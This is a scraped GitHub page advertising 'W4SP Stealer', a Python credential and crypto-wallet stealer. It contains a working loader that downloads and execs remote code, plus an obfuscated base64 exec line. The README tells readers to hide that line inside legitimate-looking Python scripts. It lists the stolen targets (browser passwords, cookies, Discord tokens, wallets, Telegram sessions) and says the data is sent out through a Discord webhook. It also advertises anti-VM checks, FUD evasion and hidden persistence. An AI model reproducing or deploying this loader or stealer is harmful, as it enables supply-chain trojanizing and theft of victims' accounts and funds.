Skip to content

w4sp stealer 🔥 fixed password grabber - python3 wasp stealer / w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealerathbyomo

Notifications You must be signed in to change notification settings

versayy/W4SP-STEALER

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

🚩 Table of Content

  • Setup - Stealer
  • Setup - API & Bot
  • Features - Stealer
  • Features - Injector
  • Features - Api
  • Features - Bot
  • Demo

Setup [Stealer & Injector]

run builder.py

Setup [Line ~ Optional but recomanded]

from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen("INJECTOR_LINK").read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass

# replace INJECTOR_LINK by the injector.py link from setup
# (this script was made by Billy)
# encode in b64 the last payload and replace it here
# then hide this line in a legit looking python script
# or use ur brain and ur own technique, this is just un exemple
# remeber, its for education purpose, attacking a machine w/o autorisation is illegal !

__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("%PAYLOAD%"),'<string>','\x65\x78\x65\x63'))

Setup [API]

Features [Stealer

Global

  • Saved Passwords
  • Browser Cookies
  • Get PC information
  • AntiVM - Trust Factor system, it wont send data if Gmail cookies arent' found
  • All files are uploaded to an external api <- Improved by xKian
  • Data is send throught a Discord webhook

Discord

  • Discord Tokens from browsers
  • Discord Token from discord, discordcanary, discordPTBa
  • Get all info on token (email, nitro/badge, rare friends)

Wallets

  • Exodus Wallet
  • Metamask Wallet
  • Atomic Walletk

Gaming

  • Steam Client
  • Riot Client
  • NationsGlory Client

Other

  • Telegram Session

File Stealer

  • It will search throught the pc for: saved passwords, 2fa codes, wallet keys and other sensitive information
    (idea came from Kiwi plugin on msf)

Features [Injector]

  • Brilliant persistance technique (only in injector v1.1)
  • Invisible in TaskManger StartUP tab (only in injector v1.1)
  • FUD
  • Fully runs in background
  • Hides the stealer very well

Features [API]

  • Easy to update/upgrade
  • Compatible with all w4sp versions
  • Using auto & custom obfuscation
  • Manage Users and Webhooks with API
  • Browser security => If a browser is detected (headers) it will obfusacate a fake wasp script <- Brilliant Idea by lath

Features [BOT]

  • Easy to configure
  • Manage Users and Webhooks using w4sp api
  • Auto inject file.py

Few articles on W4SP (they where writen during beta-testing)
⚠️Most articles writen after that are 95% bullshit⚠️

print('sgujmhrk')

About

w4sp stealer 🔥 fixed password grabber - python3 wasp stealer / w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealer w4sp stealerathbyomo

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages